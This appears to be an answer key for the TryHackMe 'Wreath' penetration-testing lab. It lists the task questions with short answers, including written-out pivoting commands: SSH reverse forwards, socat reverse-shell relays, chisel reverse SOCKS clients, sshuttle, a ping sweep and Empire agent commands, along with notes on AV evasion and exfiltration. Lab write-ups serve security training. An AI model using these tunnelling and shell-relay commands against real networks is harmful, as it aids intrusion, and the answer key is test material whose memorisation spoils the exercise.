TryHackMe: Wreath
Task 1–4: intro
No Answer Needed
Task 5: Webserver Enumeration
Question 1: How many of the first 15000 ports are open on the target?
Question 2: What OS does nmap think is running?
Question 3: Open the IP in your browser — what site does the sever try to redirect you to?
Question 4: What is Thomas’ mobile phone number?
Question 5: What server version does Nmap detect as running here?
MiniServ 1.890 (Webmin httpd)
Question 6: What is the CVE number for this exploit?
Task 6: Webserver Exploitation
Question 1: Which user was the server running as?
Question 2: What is the root user’s password hash?
Question 3: What is the full path to his file?
Task 7: Pivoting What is Pivoting?:
No Answer Needed
Task 8: Pivoting High Level Overview
Which type of pivoting creates a channel through which information can be sent hidden inside another protocol?
Question 9: Which Metasploit Framework Meterpreter command can be used to create a port forward?
Task 9: Pivoting Enumeration
Question 1: What is the absolute path to the file containing DNS entries on Linux?
Question 2: What is the absolute path to the hosts file on Windows?
Question 3: How could you use which IP addresses re active and allow ICMP echo requests on the 172.16.0.x/24 network using Bash?
for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep “bytes from” &); done
Task 10: Pivoting Proxychains & Froxypoxy
Question 1: What line you put in your proxychains config gile to redirect through a socks4 proxy on
socks4 4242
Question 2: What command would you use to telnet through a proxy to
proxychains telnet 23
Question 3: Which tool is more apt for proxying to a webapp: Proxychains (PC) or FroxyProxy (FP)?
Task 11: Pivoting SSH Tunnelling/Port Forwarding
Question 1: If you’re connecting to an SSH server from your attacking machine to create a port forward, would this be a local (L) port forward or a emote (R) port forward?
Question 2: Which switch combination can be used to background an SSH port forward or tunnel?
Question 3: It’s a good idea to enter our own password on the remote machine to set up a reverse proxy, Aye or Nay?
Question 4: What command would you use to create a pair of throwaway SSH keys for a reverse connection?
Question 5: If you wanted to set up a reverse portforward from port 22 of a remote machine ( to port 2222 of your local machine (, using a keyfile called id_rsa
and backgrounding the shell, what command would you use? (Assume your username is "kali")
ssh -R 2222: kali@ -i id_rsa -fN
Question 6: What command would you use to set up a forward proxy on port 8000 to user@target.thm, backgrounding the shell?
ssh -D 8000 user@target.thm -fN
Question 7: If you had SSH access to a server ( with a webserver running internally on port 80 (i.e. only accessible to the server itself on, how would you forward it to port 8000 on your attacking machine? Assume the username is "user", and background the shell.
ssh -L 8000: user@ -fN
Task 12: Pivoting plink.exe
Question 1: What tool can be used t convert OpenSSH keys into PuTTY style keys?
Task 13: Pivoting Socat
Question 1: Which socat option allows you to reuse the same listening port for more than one connection?
Question 2: If your Attacking IP is, how would you relay a reverse shell to TCP port 443 on your Attacking Machine using a static copy of socat in the current directory?
Use TCP port 8000 for the server listener, and do not background the process.
./socat tcp-l:8000 tcp:
Question 3: What command would you use to forward TCP port 2222 on a compromised server, to, using a static copy of socat in the current directory, and backgrounding the process (easy method)?
./socat tcp-l:2222,fork,reuseaddr tcp: &
Task 14: Pivoting Chisel
Question 1: What command would you use to start a chisel server for a reverse connection on your attacking machine?
Use port 4242 for the listener and do not background the process.
./chisel server -p 4242 — reverse
Question 2: What command would you use to connect back to this server with a SOCKS proxy from a compromised host, assuming your own IP is and backgrounding the process?
./chisel client R:socks &
Question 3: How would you forward to your own port 33060 using a chisel remote port forward, assuming your own IP is and the listening port is 1337? Background this process.
./chisel client R:33060: &
Question 4: If you have a chisel server running on port 4444 of, how could you create a local portforward, opening port 8000 locally and linking to
./chisel client 8000:
Task 15: Pivoting sshuttle
Question 1: How would you use sshuttle to connect to, with a username of “pwned” and a subnet of
sshuttle -r pwned@
Question 2: Which switch (and argument) would you use to tell sshuttle to use a keyfile called “priv_key” located in the current directory?
— ssh-cmd “ssh -i priv_key”
Question 3: What switch (and argument) could you use to fix this error?
-x 172.16.0
Task 16: Pivoting Conclusion
No answer needed
Task 17: Git Server Enumeration
Question 1: Excluding the out of scope hosts, and the current host (.200), how many hosts were discovered active on the network?
Question 2: In ascending order, what are the last ocets of these host IPv4 addresses? (e.g. if the address was, submt the 80)
Question 3: Scan the hosts — which one does not return a status of “filtered” for every port (submit the last octet only)?
Question 4: Which TCP ports (in ascending order, comma separated) below port 15000, are open on the remaining target?
Question 5: Assuming that the service guesses made by Nmap are accurate, which of the found services is more likely to contain an exploitable vulnerability?
Task 18: Git server Pivoting
Question 1: What is the name of the program running the service?
Question 2: Do these default credentials work (Aye/Nay)?
Question 3: There is one Python RCE exploit for version 2.3.10 of the service. What is he EDB ID number of this exploit?
Task 19: Git server Code review
Question 1: Look at the information at the top of the script. On what date was this exploit written?
Question 2: Bearing this in mind, is the script written in python2 or python3?
Python 2
Question 3: Just to confirm that you have been paying attention to the script: What is the name of the cookie set in the POST request made on line 74 (line 73 if you didn’t add the shebang) of the exploit?
Task 20: Git server Exploitation
Question 1: What is the hostname for this target?
Question 2: What operating system is this target?
Question 3: What user is the server running as?
Question 4: How many make it to the waiting listener?
Task 21: Git server Stabilisation & Post Exploitation
Question 1: What is the Administrator password hash?
Question 2: What is the NTLM password hash for he user “Thomas”?
Question 3: What is Thomas’ password?
Task 22: Command and Control Introduction
No answer needed
Task 23: Empire: Installation
No answer needed
Task 24: Empire: Overview
Question 1: Can we get an agent back from the git server directly (Aye/Nay)?
Task 25: Empire: Listeners
No answer needed
Task 26: Empire: Stagers
No answer needed
Task 27: Empire: Agents
Question 1: Using the help
command for guidance: in Empire CLI, how would we run the whoami
command inside an agent?
shell whoami
Task 28–32:
No answer needed
Task 33: Personal PC Enumeration
Question 1: Scan the top 50 ports of the last IP address you found in Task 17. Which ports are open (lowest to highest, separated by commas)?
Task 34: Personal PC Pivoting
Question 1: Using the Wappalyzer browser extension (Firefox | Chrome) or an alternative method, identify the server-side Programming language (including the version number) used on the website.
PHP 7.4.11
Task 35: Personal PC The Wonders of git
Question 1:Use your WinRM access to look around the Git Server. What is the absolute path to the Website.git
Task 36: Personal PC Website Code Analysis
Question 1: What does Thomas have to hone Mrs Walker about?
Neighbourhood Watch Meetings
Question 2: Aside from the filter, what protection method is likely to be in place to prevent people from accessing this page?
Basic Auth
Question 3: Which extensions are accepted (comma separated, no spaces or quotes)?
jpg, jpeg, png, gif
Task 37: Personal PC Exploit PoC
No asnwer needed
Task 38: AV Evasion Introduction
Question 1: Which category of evasion covers uploading a file to the storage on the target before executing it?
On-Disk Evasion
Question 2: What does AMSI stand for?
Anti-malware Scan Interface
Question 3: What category of evasion does AMSI affect?
In-Memry Evasion
Task 39: AV Evasion AV Detection Methods
Question 1: What other nam can be used for Dynamic/Heuristic detection methods?
Question 2: If AV software splits a program into small chunks and hashes them, checking he results against a database, is this a static or dynamic analysis method?
Question 3: When dynamically analysing a suspicious file using a line-by-line analysis of the program, what would antivirus software check against to see if the behaviour is malicous?
Pre-defined rules
Question 4: What could be added to a file to ensure that only a user can open it (preventing AV from executing the payload)?
Task 40: AV Evasion PHP Payload Obfuscation
Question 1: What is the Host Name of he target?
Question 2: What is our current username (include the domain in this)?
Task 41: AV Evasion Compiling Netcat & Reverse Shell!
Question 1:What output do you get when running the command: certutil.exe
CertUtil: -dump command completed successfully.
Task 42: AV Evasion Enumeration
Question 1: [Research] One of the privileges on this list is very famous for being used in the PrintSpoofer and Potato series of privilege escalation exploits — which privilege is this?
Question 2: What is the Name (second columm from the left) of this service?
Question 3: is the service running as the local system account (Aye/Nay)?
Task 43: AV Evasion Privilege Escalation
No answer needed
Task 44: AV Evasion Exfiltration Techniques & Post Exploitation
Question 1: Is FTP a good protocol to use when exfiltrating data in a modem network (Aye/Nay)?
Question 2: For what reason is HTTPS preferred over HTTP during exfiltration?
Question 3: What is the administrator NT hash for this target?
Task 45–46:
No answer needed
That’s all. For queries go Here.